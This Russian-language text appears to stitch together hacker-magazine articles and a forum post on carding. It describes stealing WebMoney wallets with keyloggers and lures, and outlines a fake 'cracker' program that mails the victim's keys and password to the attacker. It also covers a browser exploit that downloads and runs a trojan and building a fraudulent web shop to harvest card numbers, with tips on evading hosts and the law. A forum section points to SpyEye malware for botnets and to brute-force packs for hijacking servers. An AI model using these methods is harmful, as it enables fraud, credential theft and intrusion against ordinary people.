После того, как кошельки WebMoney будут скачаны, необходимо узнать идентификатор счета (это выполнит клиент), а также пароль на вход. Пароль на WebMoney не может быть изменен и задается всего один раз (аналог PIN-кода в кредитной карте), поэтому возможно, юзер записал его в файл, чтобы не забыть. При удачном стечении обстоятельств, хакер вытягивает этот файл и кошельки и полностью завладевает счетом жертвы. Внимание! Это очень опасно, поскольку система перевода денег имеет историю всех проведенных операций. Скажу по опыту, что у взломщиков есть свои люди, которые отмывают деньги на счете, беря за услуги некоторый процент от суммы.
Существуют и другие способы добычи пароля. Например, такой: хакер сумел узнать несколько паролей, которые жертва использует в Сети. Он пробует перебрать их все и, возможно, один из них будет верным. Когда способов не остается, можно найти подходящий кейлоггер, шлющий клавиатурный дамп на вражеский e-mail адрес. После того как он будет запущен на компьютере, остается только ждать, пока пользователь не воспользуется клиентом WebMoney. Существует способ для ускорения этого процесса - отправка жертве письма, в котором будет говориться о том, что кошелек был пополнен на энную сумму. Тогда-то он обязательно запустит клиент.
Вообще, есть еще один метод завладения WM-кошельком. Он практикуется среди богатых, но ламернутых личностей, которые недавно, но успешно постигают кардерские махинации. Создается программа, типа "крякера интернета", но она не крякает интернет, а уводит кошельки WebMoney. Реализовать ее - пара пустяков, проблема в другом - впарить прогу жертве. Это может сделать хороший хакер, имеющий богатый опыт в социальной инженерии.
Исходный код этой небольшой программы ты найдешь во врезке. Полный исходник проекта есть на диске.
Помимо самой службы WebMoney, есть сервис Merchant (http://merchant.webmoney.ru), который нужен для проведения онлайн-операций по переводу денег с одного WM-кошелька на другой. Обычно сервис применяется в различных проектах, например, интернет-магазинах. Если хакер взламывает подобный ресурс, он просто заменяет в исходном коде скрипта ссылку и параметры на свой кошелек WebMoney. При этом клиент будет пересылать деньги на счет злоумышленника. Бесспорно, это скоро будет замечено, но взломщик успеет обогатиться.
Бреши в ослике
RPC-уязвимость далеко не единственная бага в форточках. Рассмотрим еще один пример - ошибка в обработке тега <OBJECT>, позволяющая выполнять произвольный код на машине клиента. Реализовав такую уязвимость, хакеру ничего не стоит залить троян на жертву, да еще и записать в лог его IP-адрес, который впоследствии будет проверен на заражение бэкдором.
Для написания эксплоита достаточно создать следующий html-документ:
А в object.html положить скрипт, например на Visual Basic. В нем будет производиться выкачивание трояна по указанному адресу и его последующий запуск. При желании можно пофантазировать с записью бэкдора в реестр (если, конечно, в нем уже не реализована подобная функция), но это исключительно проблемы взломщика.
Для записи IP-адреса в лог-файл надо написать простенький perl-скрипт. Например, такой:
Perl-скрипт для записи адреса в лог
На этот сценарий делается редирект с главной страницы, либо вызывается SSI-вкладка, к примеру, следующая:
Следует помнить, что для выполнения SSI-вставок, файлу необходимо дать расширение shtml. Что касается файлов для записи (ipz.log), то они должны иметь атрибут 666.
Смысл этого метода заключается в засылке вредоносных программ на компьютер жертвы, используя бреши в операционной системе. Регулярно обновляемый список уязвимостей ты можешь найти на любом портале по безопасности.
А как же Linux?
Что касается Linux, то все методы этой, казалось бы, неприступной системы были изложены в статье этого номера "Найди и поимей!". В этой системе можно найти, пожалуй, только кредитные карты и файлы, хранящие в себе пароли, а также аккаунты на какие-либо ресурсы.
Эффективным способом хищения информации является снифинг данных. Снифер - программа, которая перехватывает весь трафик на определенных интерфейсах и отбирает из него инфу, которая указана в конфе снифака. Программ, которые перехватывают весь трафик и записывают его в логи (при этом фильтрация остается проблемой хакера), довольно мало. В основном, сниферы удобно настраиваются и незаметно запускаются на сервере.
Принцип всех сниферов основан, как я уже сказал, на перехвате данных определенного сетевого интерфейса. При этом устанавливается режим promisc, при котором все данные проходят через сетевую карту, несмотря на то, что предназначены они были для других машин. Ты, наверное, догадываешься, что успешно заюзать снифер можно лишь на компьютерах, которые выполняют функцию маршрутизаторов. Если это так, то хакер будет перехватывать весь трафик в локальной сети.
В последнее время сниферы пишут очень грамотные люди. Их не способны засечь никакие утилиты, типа ps, ifconfig, IDS и прочие.
Еще одним интересным способом взлома является брутфорсинг (перебор) паролей на определенный сервис. Я слышал о таких приватных проектах, как переборщик https-аккаунтов. Таким образом, взломать учетную запись бизнесмена на каком-либо секурном сервисе вполне реально.
Я уже не говорю о переборе паролей на небезопасных сервисах, которые поддаются снифингу. Таких брутфорсеров в интернете навалом, и большинство из них поддерживают многопоточный перебор. Конечно, прошли времена, когда в качестве аккаунтов применялись пары root/root или admin/admin, но словарные пароли встречаются очень часто. Так что подобрать пароль становится вполне реальным.
Таким образом, подвожу итог. Воровство аккаунтов - наболевшая тема. Воруют все кому не лень, и то, что плохо лежит. Поэтому, если ты преуспевающий сетевой бизнесмен, рекомендую защитить свою систему необходимыми патчами, а также грамотно настроенным фаерволом. Только тогда ты будешь в абсолютной безопасности.
Кодинг
Настало время представить проект, реализующий «крякер» кошельков WebMoney. На самом деле, эта фейк-программа просто отсылает все ключи и пароль на мыло злоумышленника.
Для реализации задуманного потребуются следующие компоненты:
5 Label (текст, вкладка Standard), 5 Edit (вводимый текст, вкладка Standard), 3 Button (кнопка, вкладка Standard), Memo (Текстовое поле, вкладка Standard) и ProgressBar (вкладка Win32), а также компоненты NMSMTP(вкладка FastNet) и OpenDialog(вкладка Dialogs).
Назначаем caption кнопкам и текстовым полям.
затем кнопкам:
Полю Memo ставим текст, тоже через переменные:
'Размер файла ключей должен быть минимальным, т.к. программа изменяет его содержимое и закачивает на сервер.'+#13#10+
'Если размер будет более 1 мегабайта, то компания WebMoney заметит среди своих'+#13#10+
'ключей - твой, который имеет большой размер.';
События для нажатых кнопок:
// Обзор
// если диалог удачно запущен то
// записываем имя файла
// Генерировать
// ProgressBar1 - изменение положения ползунка прогресс-бара
// Вложенные файлы
// Body отправляемого письма
// Тема письма
// Имя программы, которая отправляла письмо
// Reply-To адрес
// Почта отправителя
// Имя отправителя
// E-mail кардера
// SMTP сервер хакера
// Отсылка письма
// Сообщение об удачной отправке денег жертве
// Отмена
// Прогресс-бар ставим на 0
Обзор сниферов
Как я уже говорил, в инете полно сниферов. На первый взгляд разобраться в них не так-то просто, поэтому публикую небольшой обзор программ-нюхачей.
Sniffit. Один из первых сниферов, который по-прежнему является очень популярным. Он сохраняет первые 400 байтов пакета по умолчанию, но хакер может настроить его так, чтобы он перехватывал пароль жертвы.
TCPdump. Знаменитый снифер. Считается профессиональным административным средством.
ADMsniff. Известная, очень квалифицированная группа хакеров ADM написала отличный снифер. Определенно советую посмотреть, т.к. все, что они делают, стоит внимания.
Linsniffer. Популярный снифер, разработанный для платформ Linux.
Sunsniff. Этот снифер выполнен под платформу SunOS. Возможно, один из самых известных сниферов, сделанный почти десять лет назад.
Поломали?
Если ты оказался в лапах хакера, то, возможно, у тебя бреши в операционке. Обязательно читай bugtraq и вовремя накладывай патчи на свою систему. Взять их можно на www.microsoft.com.
Способов украсть ценную информацию и сбережения кардера очень много.
Я не буду тебя учить эксплуатировать уязвимость. Об этом писали различные хакерские порталы, а также Хакер #9. Я лишь заострю твое внимание на командах, которые могут пригодиться взломщику, захватившему права на системе жертвы.
В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой "type file".
Если хакер взламывает подобный ресурс, он просто заменяет в исходном коде скрипта ссылку и параметры на свой кошелек WebMoney.
Следует помнить, что для выполнения SSI-вставок, файлу необходимо дать расширение shtml.
Эффективным способом хищения информации является снифинг данных. Снифер - программа, которая перехватывает весь трафик на определенных интерфейсах и отбирает из него инфу, которая указана в конфе снифака.
Еще одним интересным способом взлома является брутфорсинг (перебор) паролей на определенный сервис. Я слышал о таких приватных проектах, как переборщик https-аккаунтов.
Личный псевдосайт кардера
Некоторые личности ничего не делают и... получают реальные доходы. Без начального капитала, с абсолютного нуля. И повторить их опыт может каждый, даже ты. Для этого нужно желание, удача и чуть-чуть терпения. Я расскажу тебе о прибыльном бизнесе, построенном на псевдосайтах.
Что такое псевдосайты
Псевдосайт - это не что иное, как умело сделанный ресурс, который имеет автоматизированную систему оплаты по кредитным картам. Но в отличие от проектов, которые исправно высылают товар после оплаты, псевдоресурс совершенно негуманно динамит покупателя, помещая данные о кредитке в отдельную базу. При серьезном подходе к делу, псевдосайт может приносить кардеру умопомрачительные доходы. Все потому, что интернет-магазины (либо порногалереи) пользуются большой популярностью среди тупых, но богатых буржуев, для которых онлайновые покупки - норма жизни.
Что нам стоит сайт построить
Чтобы построить псевдосайт, необходимо найти для него программное обеспечение - движок. Он состоит из отдельных html-страниц (формы для оплаты) и скриптов, которые обрабатывают вводимую информацию. Авторы движков используют два способа для хранения полученных данных:
Через базу данных (БД). Этот способ избавляет от многих проблем, с которыми может столкнуться пользователь движка, для успешной работы достаточно создать базу и пару таблиц. Затем скрипты сами будут обращаться к БД и запрашивать/сохранять данные.
Посредством файлов. Все бесплатные движки распространяются именно с таким алгоритмом. Здесь тебе придется попотеть, изменяя дефолтовые значения путей в конфигах сценариев. Нельзя забывать и о правах доступа к файлам, в которые будет записываться информация (проставляются вручную).
На фриварных источниках валяется неплохой движок dcshop (http://kamensk.net.ru/forb/1/x/id1608.zip). Он организует универсальный интернет-магазин по продаже всякого хлама. Умеет авторизовывать после оплаты по кредитке и комплектуется скриптом для администрирования товаров.
Удобно, что dcshop работает как под UNIX, так и под NT платформы. В довесок к этому он снабжается подробным мануалом и кучей дефолтовых конфигов.
Для того чтобы магазин функционировал, от хостинга требуется:
Первые два пункта, которые необходимы, удовлетворяют практически все бесплатные хостинги, поэтому регистрируйся на буржуйском ресурсе (проще отмазаться потом) и приступай к установке онлайн-магазина. При желании смотри работу проекта в онлайне по адресу http://kamensk.net.ru/forb/cgi-bin/shop/dcshop.cgi.
Хотя dcshop для хранения не использует БД (пишет в отдельные файлы), он как раз подойдет, так как не каждый халявный хостинг предоставляет доступ к БД (но бывают приятные исключения, например, www.spaceports.com).
Доставка и установка
Движок состоит из трех скриптов: магазин с поддержкой корзины, админ-зона и сценарий для запроса инфы о кредитной карте. К каждому скрипту есть свой конфигурационный файл.
Сперва настрой конфиг .setup, в нем необходимо изменить несколько значений переменных и пути к директориям. Главной переменной в конфиге является $cgidir, она указывает на директорию cgi-bin, в которой будет располагаться большинство скриптов движка. Лучше всего создать подпапку в каталоге со скриптами и определить в ней сценарии магазина. К примеру, значение $cgidir может быть "/home/carder/web/cgi-bin/eshop".
Далее идут пути, которые зависят от $cgidir. Лучше их не менять, чтобы не было путаницы при закачивании файлов на сервер. Следующая за ними переменная $order_database ведет к самому интересному файлу, ради которого мы и устанавливаем проект dcshop. Это база кредитных карт, точнее, в этот документ будет сваливаться вся информация о буржуйских кредах. Дефолтовое значение переменной - "orders.txt", и находится этот файл по пути, прописанному в переменной $order_dir. Рекомендую менять пути на более сложные, иначе база будет доступна через веб.
Переменная $templatefile отвечает за главный html-файл, который будет подгружаться после исполнения скрипта dcshop.cgi. В этот файл ты можешь поставить свой копирайт, либо убедить буржуя в законности твоей коммерческой деятельности.
Затем укажи путь к бинарнику sendmail. Обычно он располагается в директории /usr/sbin, в противном случае местоположение будет оговорено администрацией хостинга. Переменная задается для того, чтобы после успешного заказа клиент получил письмо о принятии платежа. Заодно поменяй адрес smtp-сервера, мыло, с которого будет отправлено письмо, а также его тему (например, smtp.spaceports.com).
В следующей секции конфига задаются абсолютные пути к сайту. Допустим, тебе дали домен shop.hosting.net. Исходя из этого, поменяй переменные $cgiurl и $mainurl на значения к директориям с html и cgi-bin соответственно, к примеру, http://shop.hosting.net/cgi-bin/eshop. Там же укажи путь к картинкам (они будут располагаться в директории для html-файлов).
Проект подразумевает наличие https-сервера, но я сильно сомневаюсь, что фриварный хостинг предлагает https. Если твой - не исключение из правил, то значения $secureurl и $secureimgurl делай равными $cgiurl и $mainurl. В конце секции укажи e-mail администратора проекта.
На этом, собственно, дефолтовая настройка заканчивается. Дополнительно можно (настоятельно советую) переопределить пути к дефолтовым скриптам. Тогда в случае обнаружения баги в проекте dcshop, твой ресурс не взломают (не зная новые пути). Итак, меняй значения $dcscript, $checkout_script и $adminscript. Открой скрипт dcshop.cgi и измени путь к конфигу в строке require. И переименуй конфиг. Если возникнут проблемы, про это есть и в FAQ’е проекта, и в файле readme.
Оттачиваем остальные скрипты
Помимо главного конфига, есть setup-файлы для скриптов checkout и admin. В конфиге для checkout измени дефолтовые темплейты html на что-нибудь более красивое (лично мне не понравилось слово "demo" в тексте). А в dcshop_admin.setup тебе придется поменять путь к директории, в которой хранится пароль администратора. Рекомендую закрыть доступ к директории с указанным файлом (для чего и нужна поддержка собственных .htaccess-файлов), потому что знающий чел сможет увидеть содержимое каталога, а следовательно, и файла с паролем.
Правильная транспортировка
Настало время для переноса файлов на FTP-сервер. Сперва создай директорию для html-файлов, а также вложенный каталог Images (обрати внимание на регистр). Затем перелей все дефолтовые изображения в эту папку. Зайди в cgi-bin/eshop, в эту директорию залей все конфиги и скрипты. Нюанс - заливать надо в ASCII-режиме, иначе скрипты не будут работать. Осталась самая малость - поставь на все каталоги права 777, а на файлы .pl и .cgi - 755.
Самое время затестить результат. Обратись к главному скрипту магазина dcshop.cgi. Если все верно, то магазин будет функционировать без всяких побочных выкидонов. Если выдаст ошибку 500, узнай причину, по которой сценарий не работает. Для этого создай файл .htaccess в корне WWW со следующим содержанием:
После этого еще раз обратись к скрипту и читай содержимое лога в html-директории. Возможно, ты просто забыл залить какой-нибудь файл либо изменить дефолтовый путь.
Теперь займись админским скриптом. Чтобы никто тебя не поимел либо не спер большую базу новых кредиток, зайди в админ-зону и зарегистрируйся под новым юзером с правами администратора. После этого топай по линку "Change Configuration Setting" и запрети регистрацию новых юзеров. Рули на здоровье своим онлайн-магазином.
Имеет смысл создать отдельную директорию для админ-зоны и закрыть ее дополнительной авторизацией (от греха подальше). Это легко делается с помощью стандартных средств Apache. Вначале необходимо создать .htaccess файл в каталоге с админ-скриптом. В нем пиши следующее:
Затем создай .htpasswd, в котором записывается аккаунт в виде пары loginassword. Допустимые алгоритмы шифрования пароля: DES, MD5, SHA, а также Plain text. Кодировать пароли умеет утилита htpasswd, входящая в поставку Apache. Алгоритм MD5 поддерживается всеми версиями web-сервера и наиболее надежный. Ставится пароль командой htpasswd -bcm .htpasswd admin myp4ssw0rd, опция -bcm означает запись MD5-пароля в новый .htpasswd.
Права на .htaccess и .htpasswd установи равными 600. Это позволит только тебе изменять их, у других бродяг не будет доступа к этим важным файлам.
Строим бизнес
Теперь необходимо изменить дефолтовые товары. Если с фантазией у тебя все в порядке, ты запросто придумаешь товары, которые захотят купить богатые и тупые иностранцы. Но прежде необходимо разобраться со структурой базы товаров.
В файле с товаром (неважно каким) можно задать несколько параметров. Это идентификатор (ID), категория (Category), название продукта (Name), изображение (Image), описание(Description), цена (Price) и налог с продаж (Taxable). Дополнительно есть свои опциональные параметры, например, цвет и стиль. О них читай в файле readme.txt. Забиваешь данные, а они автоматом помещаются в папку Data относительно каталога cgi-bin/.
В этом же каталоге хранится установочный скрипт с краткой информацией о данной категории товаров. Удобно, что движок включает четыре готовых образца. Таким образом, просто сделай аналогичный темплейт для категории товара и вперед.
База все-таки лучше
Написать свой движок с поддержкой БД не так уж и сложно. Необходимо знать принципы обмена между клиентом (скриптом проекта) и сервером (БД mySQL), к которому у тебя будет доступ. При этом не обязательно писать отдельный движок, достаточно внести некоторые изменения в код dcshop и научить его обращаться с БД.
С помощью специального модуля DBI.pm можно работать с mySQL (именно такая БД рулит на большинстве хостингов). Тебе потребуются три вещи: умение коннектиться к базе, вставлять и изменять в ней данные, а также считывать инфу из нужных таблиц в БД. Чтобы переделать файловый движок, необходимо всего лишь заменить обращение к файлу запросом к базе. Фрагменты кода, реализующие грамотную работу с mySQL (код снабжен подробными комментариями), скачивай по адресу http://kamensk.net.ru/forb/1/x/mysql-code.
Закон есть закон
Когда-нибудь твой ресурс будет закрыт. Это произойдет, скорее всего, после того, как в службу поддержки хостинга поступит жалоба от очередного надутого клиента. Поэтому тебе не помешают несколько полезных советов, чтобы последствия закрытия проекта не отразились на твоем здоровье:
1. При организации мини-порногалереи никто не будет требовать с тебя какой-либо ответственности, если ты сделаешь стартовую страницу с предупреждением о совершеннолетии клиента.
2. Если дела пошли в гору, зарегистрируй себе домен второго уровня и заведи нормального хостера. Когда твой ресурс удалят, ты можешь легко изменить dns-зоны своего домена при переезде на другой хостинг.
3. Постарайся оставлять как можно меньше данных о себе на страницах ресурса. Лучше скажи, что ты какой-нибудь богатый китаец, продающий ручки Паркер, чем бедный русский студент.
4. При переезде тебе придется столкнуться с такой проблемой, как бэкап всех данных. Это необходимо сделать вовремя, когда почувствуешь, что дело пахнет керосином. Если с файлами проблем не возникает, умело забэкапить базу - дело тонкое (хотя и несложное). Для этого потребуется помощь небольшой утилиты mysqldump, которая входит в поставку mysqlclient. Заходишь на шелл своего хостинга и набираешь команду:
Соответственно, аккаунт к базе должен иметь вид client:clientpassword, а база называться eshop. Бинарник сформирует структуру таблицы, которая должна быть заархивирована и транспортирована на другой хостинг. Сжимать лучше архиватором bzip:
На новом хостинге необходимо его распаковать и создать копию структуры базы (по файлу eshop.sql). При этом не нужно заботиться о создании таблиц и БД, все сделает mysqldump:
С помощью переопределения ввода ты позволяешь бинарнику mysql получить команды прямо из файла. В нашем случае из бэкапа eshop.sql.
5. Чтобы выйти сухим из воды, удали все файлы со старого хостинга (разумеется, после бэкапа) и дропни базу данных. Это можно сделать командой "drop database eshop;" в клиенте mysql.
Теперь ты кардер
Вот и все. Псевдобизнес - очень прибыльное дело, потому что все заработанные кредитки уходят только тебе. В день такой ресурс могут посетить десятки, а то и сотни богатых буржуев (зависит от раскрутки). Но в организации подобных проектов существует определенная доля риска, иначе все понаделали бы онлайн-магазинов и жили за счет буржуев. Поэтому, если ты прилично зарабатываешь, и решил создать псевдосайт только из любопытства, поразмысли на досуге, стоит ли тебе тратить свои нервы и деньги на противозаконную деятельность...
Раскрутка ресурса
Сделать псевдосайт - полдела, необходимо его еще и раскрутить. В противном случае твой ресурс запылится и не принесет никакой пользы. Для привлечения посетителей, конечно, все средства хороши, но не все эффективны. По-хорошему, если ты планируешь заколачивать на ресурсе приличные бабки, придется сначала потратиться на раскрутку.
Прежде всего, учитывай, что твоя основная аудитория - иностранцы. Следовательно, реклама рассчитана на них. Скорее всего, сам ресурс придется сделать на английском языке, либо на русском и английском одновременно. Далее регистрируешь ресурс на поисковых серверах, при этом тебя интересуют как наши поисковики, так и забугорные. Никогда не заморачивайся с поиском полного списка поисковых серверов, достаточно знать один крупный (к примеру, www.yandex.ru или www.rambler.ru), а остальные находишь непосредственно через него.
Часто эффективно проходит фокус с перенаправлением трафика с других порноресурсов. То есть создается порносервер, раскручивается в одиночку, а потом при помощи этого сервера раскручивают любые другие. Как именно это сделать - дело техники: перенаправлять часть заходов, подгружать параллельно или использовать ссылки-ловушки. При этом на раскручиваемом ресурсе ставятся счетчики рейтинговых систем, и он взлетает до небес. А там уже как лавина. Далее раскрученный ресурс, в свою очередь, можно использовать для раскрутки последующего.
Некоторые умельцы специально заводят ресурсы, чтобы предлагать другим раскрутку за деньги. Ты же можешь найти подобные ресурсы на условиях взаимораскрутки. То есть на первых порах они раскручивают тебя, а в будущем вы будете обмениваться трафиком, взаимно увеличивая количество реальных посещений на своих сайтах.
Другой эффективный способ привлечения потенциальных покупателей на свой псевдоресурс - баннерная реклама. При этом не обязательно выставлять код баннерной системы, можно выкупить показы на вторичном рынке, что порой очень выгодно. Вторичный рынок баннерных показов - по сути трафикогенерящие ресурсы, зарегистрированные в баннерных сетях. Часть показов они тратят на собственную раскрутку, а часть продают на так называемом вторичном рынке баннерных показов. Есть еще вариант продавать показы непосредственно баннерной сети, но цены будут ниже, плюс не все баннерные сети выкупают свои показы, либо выкупают только на определенных (чаще всего невыгодных) условиях.
Для покупки баннерных показов на вторичном рынке тебе понадобится баннерная биржа, на которой ты сможешь определиться с ценами (средние по бирже) на те или иные баннерные сети и форматы баннеров, плюс выкупить необходимые показы, если они есть в наличии. Одна из популярных баннерных бирж - www.banstock.com. Там тебе и FAQ, и статистика по наиболее популярным (читай - пользующимся спросом) баннерным сетям и форматам, а когда-нибудь ты сможешь и сам продавать через нее баннерные показы другим начинающим ресурсам.
Хороший хостинг
www.h1.ru - российский бесплатный хостинг, баннер хостера обязателен, PHP/CGI/mySQL/SSH, могут отключить за нарушение регламента
www.rcdom.ru - PHP/CGI/mySQL
www.webservis.ru - PHP/CGI, баннер хостера обязателен
www.fatal.ru - PHP/CGI
www.spaceports.com - PHP/CGI/mySQL, баннер на сайте необязателен
www.webhosting.bootbox.net - PHP/CGI, без рекламы
www.come.to - PHP/CGI, баннер хостера обязателен
www.dot.tk - PHP/CGI, бесплатный домен второго уровня в зоне .tk
www.cgi.ru - обширный каталог PHP/CGI-скриптов (как бесплатных, так и коммерческих), именно оттуда был скачан описываемый проект dcshop
4wm.virtualave.net - большая коллекция CGI/C/C++ скриптов, все проекты в основном бесплатные
getscripts.vov.ru - ресурс, посвященный CGI-скриптам
www.cgi.agava.ru - русские CGI/PHP-скрипты в ассортименте
Бесплатный движок
При серьезном подходе к делу, псевдосайт может приносить кардеру умопомрачительные доходы.
Чтобы построить псевдосайт, необходимо найти для него программное обеспечение - движок. Он состоит из отдельных html-страниц (формы для оплаты) и скриптов, которые обрабатывают вводимую информацию.
На фриварных источниках валяется неплохой движок dcshop (http://kamensk.net.ru/forb/1/x/id1608.zip). Он организовывает универсальный интернет-магазин по продаже всякого хлама.
Рекомендую закрыть доступ к директории с указанным файлом (для чего и нужна поддержка собственных .htaccess-файлов), потому что знающий чел сможет увидеть содержимое каталога, а следовательно, и файла с паролем.
Нюанс - заливать надо в ASCII-режиме, иначе скрипты не будут работать. Осталась самая малость - поставь на все каталоги права 777, а на файлы .pl и .cgi - 755.
Затем создай .htpasswd, в котором записывается аккаунт в виде пары loginassword. Допустимые алгоритмы шифрования пароля: DES, MD5, SHA, а также Plain text. Кодировать пароли умеет утилита htpasswd, входящая в поставку Apache.
При переезде тебе придется столкнуться с такой проблемой, как бэкап всех данных. Это необходимо сделать вовремя, когда почувствуешь, что дело пахнет керосином.
Если ты прилично зарабатываешь, и решил создать псевдосайт только из любопытства, поразмысли на досуге, стоит ли тебе тратить свои нервы и деньги на противозаконную деятельность.
1. Автоматически находить множество прокси
(для этого есть такая прога называется Proxy Switcher! Скачать ее можно тут
rutracker.org
выполняет полностью все функции заялвенные космосом)
2. Сканировать интернет на наличие скрытых прокси
эту же функцию выполняет эта же прога Proxy Switcher!
3. Находить на дедиках ценные материалы, и суметь защищать свои
для этого есть програмка которая находит слова в тексте ! (например ищите СС? Вводите на дедике слово свзяаное с СС например CVV и если на дедике есть прога найдет!) скачать можно тут http://i-vd.org.ru/soft/find-txt.shtml Описание программы Folder Find Text и ещё один софт называется Everything - Программа для поиска файлов тут видео http://www.youtube.com/watch?v=wbZ2RV4Jp8U
4. Уметь быть скрытным на дедике от администратора
во первых надо чистить дедик посел каждого входа и выхода... во вторых надо иметь Админку на дедике... дабы тебя от туда не выкинули)) в третьих надо спрятать свой профиль на дедике) как это сделать?
Для WIN дедика заходишь в командную строку (cmd.exe) и пишешь:
Убрать учетку из меню выбора пользователей:
PHP код:
Еще разумно скрыть папку с файлами на учетке:
где "пользователь" - имя твоей учетки (например, user).
А также подробная инфа может быть описанна тут http://forum.hackersoft.ru/showthread.php?p=94873#post94873
5. Нескольким видам получения дедиков
Приватный словарь, который собран из 30 млн SQL записей
Технология получения доступа с использованием минимума ресурсов компьютера
ответ на все эти вопросы вы найдете тут ) http://rghost.ru/47626356 пароль на скачивание 648968874 в паке находятся разные брутфорсы статьи и многое другое вообщем ВСЕ что нужно для обогощения дедиками))
6.Получать роутеры с минимальными потерями траффика
тут я бессилен т. к. я кардер и с трафиком такого рода дел не имел... да и мне не нужно... но все таки почитайте эту статью http://rutracker.org/forum/viewtopic.php?t=2953621
7. Получать уязвимые сайты и превращать их в прокси с шифрованием
на этот вопрос отвечает все таже прога proxy switcher http://rutracker.org/forum/viewtopic.php?t=3516193 вставляешь ссылку она сканит прокси и скосы... а вообще ребят на заметку прокси далеко уже не в теме и стоят они всего 1$ максимальная цена за хороший прокси... имхо ДОХНУТ они быстро!
8. Быстро создавать ботнет
создать быстро ботнет это легко... т. к. версий в паблике просто полно разных ддосеров а также вирей я бы посоветовал бы spyeye скачать его можно тут ЗАЛИВАЛ САМ!! http://my-files.ru/h4g0.Глазок.rar СРАЗУ СКАЖУ ЧТО АНТИВИРЬ БУДЕТ РУГАТСЯ ))! но самое главное что для ботнета нужен Трафик сплойты либо инжекции которые стоят как минимум от 500$ и выше... а также загрузки которые стоят примерно также )) но опять же ботнет можно иметь для разных целей )
9.Защищать свой дедик и компьютер от взлома
о дедиках мы уже говорили )) а теперь о компьютере ) есть такая веселая программка
http://tech.pp.ru/trans/truecryptrus/ TureCrypt) также в мануале о шифровании есть статьи про эту прогу !
10.Создать свой прокси сервис, или выгодно продать свою базу селлерам прокси и дедиков
как я уже и говорил прокси быстро дохнут и жить им от 20 минут до 12 часов) а дедике это определенная тема... как я уже писал выше ) http://rghost.ru/47626356пароль 648968874 тут есть не только софт как достать дедики но и свой собственный онлайн шоп по дедикам! Таким образам вы можите добывать дедике раскрутить свой шоп и продавтаь дедики ОНЛАЙН!
Механизм работы платежных систем
Кредитная карта, в первую очередь, является внешней частью твоего банковского счета. Работу кредитной системы обеспечивают: платежная система, банки, производители; простая покупка по кредитке представляет собой довольно сложный механизм. Об этом и многом другом я сегодня расскажу.
Механизм оплаты
Почти любая финансовая операции при использовании кредитки начинается с авторизации. Во время этого этапа необходимо определить, есть ли у тебя на счете необходимые средства и можешь ли ты ими воспользоваться. Авторизация может проводиться любым доступным способом. Решение об авторизации может принять сама карта (в случае карты с микросхемой) – это метод называется off-line, т.е. связываться ни с кем не надо. В противном случае необходимо запросить подтверждение у банка: запрос отправляется в первую очередь эквайреру (в процессинговый центр), затем пересылается эмитенту, который принимает решение, ответ перенаправляется снова эквайреру и только потом возвращается на место запроса (такой метод называется on-line). Это процесс может проходить через сеть, или продавец может просто спросить – голосом или по факсу.
Если авторизация подтверждена, то дальше ты можешь в полной мере распоряжаться зарезервированной суммой. Если ответ на запрос не пришел, то – извини. И это еще не худший вариант - в ответ может прийти приказ продавцу изъять у тебя карту (например, если они числится потерянной или украденной). Поэтому авторизация является ключевым этапом сделки. В редких случаях авторизации может и не быть, подробнее об этом ниже.
Сумма, на которую запрашивалась авторизация, на твоем счету замораживается, даже если ты вдруг передумаешь делать покупку. По завершении авторизации и через небольшой промежуток времени банк приступает к переводу средств на счет продавца. То есть - ты уже ушел из магазина, забрав покупки, а продавец все еще ждет свои деньги. Для начала эмитент отправляет запрос на перевод зарезервированных средств расчетному банку, который доставит их счет эквайрера, который уже, в свою очередь, перенаправит их туда, где ты совершил покупку. За перевод средств эквайрер оставит себе небольшой процент от суммы, за срочность процент будет больше. В общей сложности продавцу придется ждать денег от нескольких часов до нескольких дней. За это многие магазины не любят обслуживать креды.
Вся совокупность финансовых операций по кредам от начала до конца называется взаимообменом (или interchange).
Что нам может дать банк
С банковской точки зрения креды можно разделить на три основных класса. Это важно, так как этим определяется, каким образом ты сможешь распоряжаться своими деньгами или брать в кредит.
1. Дебетовые (расчетные) карты – ты можешь использовать только те средства, которые досрочно положил на свой счет. Такую креду получить проще всего, и стоит она дешевле остальных (иногда их даже выдают бесплатно). Никакой кредит или перерасход средств по расчетной карте не предусмотрен. Кстати, дебетовые карты являются самыми распространенными.
2. Кредитные карты – служат для получения определенного (заранее оговоренного) кредита под определенный процент на определенный срок. К сожалению, процент довольно велик – от 10 до 40% годовых для России. На счет карты деньги вносить не нужно. Соответственно, чем больший кредит дается по карте, тем ее сложнее получить и тем она элитнее (сумма кредита может доходить до нескольких десятков тысяч баксов). Для заключения контракта необходимо, помимо основных документов, представить справку о твоих ежемесячных доходах.
3. Овердрафтные карты (почти то же самое, что кредитно-дебетовая карта) – расчетные карты с кредитным лимитом. Можно класть деньги на счет и выполнять определенный перерасход. Кредит дается обычно на срок от одного до трех месяцев, но чем дольше у тебя остается долг, тем больший ты должен будешь выплатить процент. ИМХО, такие карты самые удобные.
По привычке и дебетовые, и овердрафтные, и кредитные карты называют просто кредитными (кредитками/кредами), что, как видишь, не совсем верно.
Кстати, самую первую свою кредитку можно приобрести уже с 14 лет.
В принципе, продавцу/банкомату абсолютно неважно, по какой карте ты расплачиваешься (твои это средства или кредит), они даже не знают, сколько денег у тебя на счету. Но в некоторых местах дебетовые креды не принимают, в отличие от кредитных или кредитно-дебетовых (в чем одно из их преимуществ).
Кстати, по кредитным или овердрафтным картам очень часто кидают банк. Порой банку практически невозможно законно вернуть себе весь кредит даже через суд, если клиент отказывается возвращать деньги (тут, по решению суда, они могут только вычитать некоторый процент из официальной (!) зарплаты должника). Поэтому в России долгое время рядовым клиентам предоставлялись исключительно дебетовые карты (даже если карта была кредитной по определению). Лишь в последние несколько лет стало реальным купить полноценную кредитную карту.
Еще очень важную роль играет такой показатель, как лимит суммы, на которую ты можешь совершить покупку без авторизации (наличие средств на креде не проверяется, а банку-эмитенту просто направляется платежное поручение на данную сумму). К сожалению, такая сумма сравнительно мала (около $50). Вот еще один из способов обуть банк, можно даже по пустой или левой креде. Хотя, по большому счету, банку твои 50 баксов как капля в море (сильно ты их не расстроишь). В России такая система мало распространена, а жаль.
Платежные системы
